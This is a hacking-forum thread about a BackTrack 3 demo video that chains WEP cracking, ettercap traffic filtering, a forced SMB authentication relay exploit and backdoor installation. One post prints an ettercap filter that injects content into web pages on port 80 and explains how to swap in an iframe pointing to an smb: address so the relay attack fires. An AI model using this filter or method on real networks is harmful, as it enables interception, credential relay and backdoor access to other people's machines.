|
|||||||
| BT3 Videos A collection of videos relating to BT3 |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|||
|
This was just for fun... its not really a tutorial but more of a demonstration... i think i did a good job with this video... the music is epic Lol...
cracked wep... filter traffic with ettercap and force smb authentication... smb relay exploit... upload tools for a secure back door... enjoy and let me know what you think... im going to talk to Adrian Crenshaw's and see if he would like this video on his site... direct link http://vimeo.com/5154318 |
|
||||
|
Quote:
maybee it is my own inexperience, but as i tried Fast-Track out, Autopwn option didn't worked successfully on all my victim machines yeah the smb.filter code would be interesting
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not." |
|
|||
|
Quote:
i did know port scan because the ettercap filter + smb exploit works when a vulnerable windows computer surfs the web... the traffic is filtered and i guess you can say a script is injected into the traffic witch will trigger a smb authentication trade off or handshake... the filter below will simply filter all traffic on port 80 and inject new data on the fly in real time... if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</title>")) { replace("</title>", "compile this script then run it with ettercap, surf the web on another computer and you will see this text at the top of every webpage"); msg("IFrame insertedn"); }} for the exploit to work you need to replace an "iframe src"smb:ipaddress"> the authentication process will then happen... Ps "this is my drunk typing" |
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
|
|